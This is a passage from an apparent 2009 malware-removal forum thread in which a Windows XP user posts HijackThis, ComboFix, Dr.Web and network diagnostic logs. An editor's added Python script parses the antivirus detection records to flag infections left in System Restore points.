DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
DPF: {D821DC4A-0814-435E-9820-661C543A4679} - hxxp://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program files\avg\avg8\avgpp.dll
Notify: avgrsstarter - avgrsstx.dll
Notify: igfxcui - igfxsrvc.dll
Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll

============= SERVICES / DRIVERS ===============

R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [2008-6-19 335240]
R1 AvgMfx86;AVG On-access Scanner Minifilter Driver x86;c:\windows\system32\drivers\avgmfx86.sys [2008-6-19 27784]
R1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [2008-5-24 53760]
R2 avg8wd;AVG8 WatchDog;c:\progra~1\avg\avg8\avgwdsvc.exe [2009-2-2 297752]
S3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\drivers\smcwgu.sys --> c:\windows\system32\drivers\SMCWGU.sys [?]

=============== Created Last 30 ================

2009-09-20 20:25 <DIR> --d----- c:\documents and settings\user\DoctorWeb
2009-09-20 19:51 <DIR> --d----- c:\program files\CCleaner
2009-09-17 16:38 <DIR> --d----- c:\program files\ESET
2009-09-15 23:48 <DIR> a-dshr-- C:\cmdcons
2009-09-15 23:46 229,888 a------- c:\windows\PEV.exe
2009-09-15 23:46 161,792 a------- c:\windows\SWREG.exe
2009-09-15 23:46 98,816 a------- c:\windows\sed.exe
2009-09-13 03:38 38,224 a------- c:\windows\system32\drivers\mbamswissarmy.sys
2009-09-13 03:38 19,160 a------- c:\windows\system32\drivers\mbam.sys
2009-09-13 03:38 <DIR> --d----- c:\program files\Malwarebytes' Anti-Malware
2009-09-03 04:25 <DIR> --d----- c:\docume~1\user\applic~1\Malwarebytes
2009-09-03 04:25 <DIR> --d----- c:\docume~1\alluse~1\applic~1\Malwarebytes
2009-08-31 22:37 <DIR> --d----- c:\program files\Trend Micro

==================== Find3M ====================

2009-08-24 03:17 123 a------- C:\drmHeader.bin
2009-08-21 06:10 335,240 a------- c:\windows\system32\drivers\avgldx86.sys
2009-08-21 06:10 11,952 a------- c:\windows\system32\avgrsstx.dll
2008-05-14 18:56 32,768 a--sh--- c:\windows\system32\config\systemprofile\local settings\history\history.ie5\mshist012008051420080515\index.dat

============= FINISH: 0:00:00.92 ===============

Attach.txt is in the enclosed zip file. Thank you.

Attach.zip
  16. Sorry for the delay again. I wanted to write down the settings for a lot of the programs I use. Also, the latest scans took a long time due to the size of both of my hard drives. I was unsuccessful in uninstalling ComboFix with the u/ setting, most likely due to the fact that I deleted ComboFix from the Desktop each time after use. Therefore I had to manually delete the QooBox folder. I don't know if all the Run commands were successful as the DOS box would flash up too quickly. However, I did manage to get all of the log files, including drivestats.

Here is resetlog.txt:

reset SYSTEM\CurrentControlSet\Services\Dhcp\Parameters\Options\15\RegLocation
    old REG_MULTI_SZ =
        SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\?\DhcpDomain
        SYSTEM\CurrentControlSet\Services\TcpIp\Parameters\DhcpDomain

reset SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{347E0056-1549-4BB2-AE29-89D6F5B1430C}\NameServerList
    old REG_MULTI_SZ =
        <empty>

added SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{347E0056-1549-4BB2-AE29-89D6F5B1430C}\NetbiosOptions
reset SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{3C3A142A-09DF-451F-8D64-518AA076676C}\NameServerList
    old REG_MULTI_SZ =
        <empty>

added SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{3C3A142A-09DF-451F-8D64-518AA076676C}\NetbiosOptions
reset SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{5F098EF5-5941-4552-A7E1-EC8B9ABF8A4A}\NameServerList
    old REG_MULTI_SZ =
        <empty>

added SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{5F098EF5-5941-4552-A7E1-EC8B9ABF8A4A}\NetbiosOptions
added SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{70827E7A-92BD-4B43-91A5-0C0730F7B3DB}\NetbiosOptions
deleted SYSTEM\CurrentControlSet\Services\Netbt\Parameters\EnableLmhosts
deleted SYSTEM\CurrentControlSet\Services\Netbt\Parameters\EnableProxy
deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{347E0056-1549-4BB2-AE29-89D6F5B1430C}\NameServer
deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{3C3A142A-09DF-451F-8D64-518AA076676C}\NameServer
deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5F098EF5-5941-4552-A7E1-EC8B9ABF8A4A}\NameServer
added SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\DisableDynamicUpdate
deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\IpAutoconfigurationAddress
deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\IpAutoconfigurationMask
deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\IpAutoconfigurationSeed
reset SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\RawIpAllowedProtocols
    old REG_MULTI_SZ =
        0

reset SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\TcpAllowedPorts
    old REG_MULTI_SZ =
        0

reset SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\UdpAllowedPorts
    old REG_MULTI_SZ =
        0

deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DontAddDefaultGatewayDefault
added SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\NameServer
deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\SearchList
deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\UseDomainNameDevolution
reset Linkage\UpperBind for PCI\VEN_8086&DEV_103D&SUBSYS_00011179&REV_83\4&16793A72&0&40F0.
    bad value was:
        REG_MULTI_SZ =
            PSched
reset Linkage\UpperBind for ROOT\MS_NDISWANIP\0000.
    bad value was:
        REG_MULTI_SZ =
            PSched
<completed>

Next is connections.txt:

Active Connections

  Proto  Local Address          Foreign Address                   State
  TCP    TOSHIBA:epmap          TOSHIBA:0                         LISTENING
  TCP    TOSHIBA:microsoft-ds   TOSHIBA:0                         LISTENING
  TCP    TOSHIBA:2869           TOSHIBA:0                         LISTENING
  TCP    TOSHIBA:10243          TOSHIBA:0                         LISTENING
  TCP    TOSHIBA:1028           TOSHIBA:0                         LISTENING
  TCP    TOSHIBA:netbios-ssn    TOSHIBA:0                         LISTENING
  TCP    TOSHIBA:1107           webcluster2b.telenet-ops.be:http  CLOSING
  UDP    TOSHIBA:microsoft-ds   *:*
  UDP    TOSHIBA:isakmp         *:*
  UDP    TOSHIBA:4500           *:*
  UDP    TOSHIBA:ntp            *:*
  UDP    TOSHIBA:1038           *:*
  UDP    TOSHIBA:1089           *:*
  UDP    TOSHIBA:1900           *:*
  UDP    TOSHIBA:ntp            *:*
  UDP    TOSHIBA:netbios-ns     *:*
  UDP    TOSHIBA:netbios-dgm    *:*
  UDP    TOSHIBA:1900           *:*

Next is drivestats.txt:

File System Type : NTFS
UserFileReads : 16445
UserFileReadBytes : 690338816
UserDiskReads : 17119
UserFileWrites : 2881
UserFileWriteBytes : 49274880
UserDiskWrites : 3002
MetaDataReads : 14905
MetaDataReadBytes : 98099200
MetaDataDiskReads : 16679
MetaDataWrites : 4878
MetaDataWriteBytes : 29663232
MetaDataDiskWrites : 5948
MftReads : 5416
MftReadBytes : 59232256
MftWrites : 4346
MftWriteBytes : 24420352
Mft2Writes : 1
Mft2WriteBytes : 4096
RootIndexReads : 0
RootIndexReadBytes : 0
RootIndexWrites : 0
RootIndexWriteBytes : 0
BitmapReads : 423
BitmapReadBytes : 1732608
BitmapWrites : 341
BitmapWriteBytes : 2940928
MftBitmapReads : 9
MftBitmapReadBytes : 36864
MftBitmapWrites : 47
MftBitmapWriteBytes : 212992
UserIndexReads : 2135
UserIndexReadBytes : 8744960
UserIndexWrites : 899
UserIndexWriteBytes : 5820416
LogFileReads : 2
LogFileReadBytes : 8192
LogFileWrites : 3571
LogFileWriteBytes : 34832384

Here is DrWeb.csv. The first file (rar32.dll) was detected on the initial Startup/Quick Scan. The others were in the Complete Scan. They look as if they were all hidden in Restore Points. One of the entries had the DivX icon and another four had the icon for ComboFix. All but the first entry are now in Quarantine:

rar32.dll;c:\windows\system32;Trojan.DownLoad.29209;Deleted.;
A0048284.exe\32788R22FWJFW\c.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617\A0048284.exe;Probably BATCH.Virus;;
A0048284.exe;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617;Archive contains infected objects;Moved.;
A0048305.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617;Probably BATCH.Virus;;
A0048431.exe\32788R22FWJFW\c.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617\A0048431.exe;Probably BATCH.Virus;;
A0048431.exe;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617;Archive contains infected objects;Moved.;
A0048474.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP618;Probably BATCH.Virus;;
A0048653.exe\32788R22FWJFW\c.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP618\A0048653.exe;Probably BATCH.Virus;;
A0048653.exe;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP618;Archive contains infected objects;Moved.;
A0043160.exe/data015\data055;E:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP580\A0043160.exe/data015;DDoS.Nitecafe.6;;
data015;E:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP580;Archive contains infected objects;;
A0043160.exe;E:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP580;Archive contains infected objects;Moved.;

Finally, here is a new HijackThis log. I got another error come up as soon as I did a scan. It came up in a General Protection Fault window and is the same error as the one received previously. I was unable to copy and paste it here and it said I had no internet connection to report the error. The log still came up fine though:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 03:51:09, on 21/09/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\System32\hkcmd.exe
C:\WINDOWS\System32\00THotkey.exe
C:\WINDOWS\LTSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
C:\WINDOWS\system32\TFNF5.exe
C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\Program Files\NoAds\NoAds.exe
C:\Program Files\HACE\Mmm\Mmm.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Logitech\SetPoint\SetPoint.exe
C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe
C:\Program Files\GetRight\GetRight.exe
C:\WINDOWS\system32\TPSBattM.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE
C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing)
O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing)
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing)
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing)
O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe
O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe
O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
O4 - HKLM\..\Run: [TFNF5] TFNF5.exe
O4 - HKLM\..\Run: [TPSMain] TPSMain.exe
O4 - HKLM\..\Run: [TFncKy] TFncKy.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [AVG8_TRAY]
C:\PROGRA~1\AVG\AVG8\avgtray.exe O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe" O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe" O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ? O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - 
C:\Program Files\Messenger\msmsgs.exe O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265 O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} (OnlineScanner Control) - http://download.eset.com/special/eos/OnlineScanner.cab O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. 
- C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing) O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe -- End of file - 8507 bytes Thanks again.
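Editor's added example (not part of the thread, and not the poster's or any helper's tool): a small triage script for the semicolon-delimited scan records quoted above. The field order (object; location; verdict; action) is inferred from the pasted lines and is an assumption; an empty action field is read as "scanner took no action on this object", which in these logs usually means the containing archive was moved instead. The point a practitioner wants from such a log is twofold: nearly every hit lives under System Volume Information\_restore{...}\RPnnn, i.e. in System Restore snapshots on both the C: and E: drives, so cleaning the live files does nothing about them; and a handful of entries with no action are not inside any archive the scanner moved, so they need a manual look. The sample records are copied from the post and labelled as constructed input.

```python
"""Triage helper for semicolon-delimited AV scan records as quoted in the post above.

Added example, not part of the original thread. Record layout (assumed from the
pasted lines): object;location;verdict;action, with an empty action field when
the scanner left the object alone (typically because its container was moved).
"""
from __future__ import annotations

from dataclasses import dataclass

# Constructed sample: the twelve records from the post, copied verbatim.
SAMPLE_LOG = r"""
rar32.dll;c:\windows\system32;Trojan.DownLoad.29209;Deleted.;
A0048284.exe\32788R22FWJFW\c.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617\A0048284.exe;Probably BATCH.Virus;;
A0048284.exe;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617;Archive contains infected objects;Moved.;
A0048305.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617;Probably BATCH.Virus;;
A0048431.exe\32788R22FWJFW\c.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617\A0048431.exe;Probably BATCH.Virus;;
A0048431.exe;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617;Archive contains infected objects;Moved.;
A0048474.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP618;Probably BATCH.Virus;;
A0048653.exe\32788R22FWJFW\c.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP618\A0048653.exe;Probably BATCH.Virus;;
A0048653.exe;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP618;Archive contains infected objects;Moved.;
A0043160.exe/data015\data055;E:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP580\A0043160.exe/data015;DDoS.Nitecafe.6;;
data015;E:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP580;Archive contains infected objects;;
A0043160.exe;E:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP580;Archive contains infected objects;Moved.;
"""

# System Restore stores its snapshots under this path on every protected volume.
RESTORE_MARKER = "\\system volume information\\_restore{"


@dataclass(frozen=True)
class Detection:
    obj: str        # object name; nested objects look like "outer.exe\inner.bat"
    location: str   # directory or container the object was found in
    verdict: str
    action: str     # "Deleted." / "Moved." / "" when no action was taken

    @property
    def full_path(self) -> str:
        return self.location.rstrip("\\/") + "\\" + self.obj

    @property
    def in_restore_point(self) -> bool:
        # A hit here is a snapshot copy, not the live file; cleaning the live
        # file leaves the snapshot in place, so it is re-detected on every scan.
        return RESTORE_MARKER in self.location.lower()

    @property
    def drive(self) -> str:
        return self.location[:2].upper()


def parse_line(line: str) -> Detection:
    fields = line.strip().split(";")
    if len(fields) < 4:
        raise ValueError(f"malformed record: {line!r}")
    obj, location, verdict, action = (f.strip() for f in fields[:4])
    return Detection(obj, location, verdict, action)


def parse_log(text: str) -> list[Detection]:
    return [parse_line(ln) for ln in text.splitlines() if ln.strip()]


def _is_inside(location: str, container: str) -> bool:
    # Case-insensitive path-prefix test honouring both separators seen in the log.
    loc, con = location.lower(), container.lower()
    return loc == con or loc.startswith(con + "\\") or loc.startswith(con + "/")


def unhandled(detections: list[Detection]) -> list[Detection]:
    """Records with no action that are not inside an archive the scanner moved or deleted."""
    handled = [d for d in detections if d.action]
    return [
        d for d in detections
        if not d.action and not any(_is_inside(d.location, h.full_path) for h in handled)
    ]


def summarize(text: str) -> dict:
    dets = parse_log(text)
    return {
        "total": len(dets),
        "handled": sum(1 for d in dets if d.action),
        "restore_point_drives": sorted({d.drive for d in dets if d.in_restore_point}),
        "outside_restore_points": [d.obj for d in dets if not d.in_restore_point],
        "needs_manual_check": [d.obj for d in unhandled(dets)],
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the quoted records this reports hits in restore points on both C: and E:, only rar32.dll outside a restore point, and three no-action entries (A0048305.bat, A0048474.bat and data015) that are not covered by a moved container. data015 is almost certainly the nested archive inside the moved A0043160.exe, but the log records it at the RP580 level, so the script cannot prove that and leaves it for a human to confirm; treating ambiguous entries as unresolved is the safer default.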
17. Sorry for my previous question, I just wanted to make sure that it was okay to run ComboFix again after I had already used it once, seeing as you said download but don't run it. I didn't realise that you were referring to using ComboFix the second time round. Now that I understand what you mean, here is the new log for ComboFix:

ComboFix 09-09-16.05 - user 17/09/2009 15:14.2.1 - NTFSx86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.476 [GMT 1:00]
Running from: c:\documents and settings\user\Desktop\Combo-Fix.exe
Command switches used :: c:\documents and settings\user\Desktop\CFscript.txt
AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

FILE ::
"c:\docume~1\user\LOCALS~1\Temp\gkmixern.sys"
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.
-------\Legacy_GKMIXERN
-------\Service_gkmixern

((((((((((((((((((((((((( Files Created from 2009-08-17 to 2009-09-17 )))))))))))))))))))))))))))))))
.
2009-09-13 02:38 . 2009-09-10 13:54 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2009-09-13 02:38 . 2009-09-13 02:38 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2009-09-13 02:38 . 2009-09-10 13:53 19160 ----a-w- c:\windows\system32\drivers\mbam.sys
2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\user\Application Data\Malwarebytes
2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\All Users\Application Data\Malwarebytes
2009-08-31 21:37 . 2009-08-31 21:37 -------- d-----w- c:\program files\Trend Micro
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-09-17 13:51 . 2007-06-28 00:17 -------- d-----w- c:\program files\GetRight
2009-09-04 00:19 . 2005-05-27 22:46 -------- d-----w- c:\program files\ahead
2009-09-03 23:36 . 2003-12-03 15:08 -------- d--h--w- c:\program files\InstallShield Installation Information
2009-09-03 23:36 . 2007-08-13 07:14 -------- d-----w- c:\program files\Real
2009-09-03 23:32 . 2008-03-11 21:50 -------- d-----w- c:\program files\Meridian Advance
2009-09-03 01:46 . 2007-07-03 20:38 -------- d-----w- c:\program files\Bulk Image Downloader
2009-09-03 01:45 . 2009-04-16 05:46 -------- d-----w- c:\program files\PicaLoader
2009-08-30 17:55 . 2007-12-29 12:48 -------- d-----w- c:\documents and settings\user\Application Data\uTorrent
2009-08-24 02:17 . 2009-02-27 16:43 123 ----a-w- C:\drmHeader.bin
2009-08-21 10:05 . 2009-07-17 17:33 -------- d-----w- c:\documents and settings\user\Application Data\Free Audio Editor
2009-08-21 05:10 . 2008-06-19 10:53 11952 ----a-w- c:\windows\system32\avgrsstx.dll
2009-08-21 05:10 . 2008-06-19 10:53 335240 ----a-w- c:\windows\system32\drivers\avgldx86.sys
2009-08-21 05:10 . 2008-06-19 10:53 27784 ----a-w- c:\windows\system32\drivers\avgmfx86.sys
2009-07-29 22:14 . 2009-07-29 22:14 -------- d-----w- c:\program files\LucasArts
.
